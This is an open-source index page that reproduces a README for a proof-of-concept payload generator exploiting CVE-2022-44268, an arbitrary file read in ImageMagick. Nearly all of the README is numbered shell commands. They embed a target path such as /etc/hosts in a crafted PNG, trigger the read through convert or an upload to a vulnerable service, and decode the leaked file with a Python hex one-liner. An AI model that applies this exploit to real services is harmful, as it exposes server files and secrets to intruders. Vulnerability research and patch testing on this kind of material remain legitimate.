Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator
https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

Last synced: about 2 months ago
JSON representation

CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator

Awesome Lists containing this project

README

        

# CVE-2022-44268 ImageMagick Arbitrary File Read PoC

### PoC for CVE-2022-44268 ImageMagick Arbitrary File Read PoC - Payload generator

### This project is created only for educational purposes and cannot be used for law violation or personal gain.
### The author of this project is not responsible for any possible harm caused by the materials of this project.

### Original finding: https://www.metabaseq.com/imagemagick-zero-days/

### Usage:
#### Installing dependencies:
`1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y`

#### Change the filename you want to read below:
`2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png`

#### Confirm everything worked perfectly
`3. $ exiv2 -pS pngout.png`

#### Trigger the PoC via convert or upload image to the vulnerable service:
`4. $ convert pngout.png gopro.png`

#### View content of file was read:
`5. $ identify -verbose gopro.png`

#### Decrypt the content:
`6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'`

## Demo


## Tested with Ubuntu 22.04 and default imagemagick installed.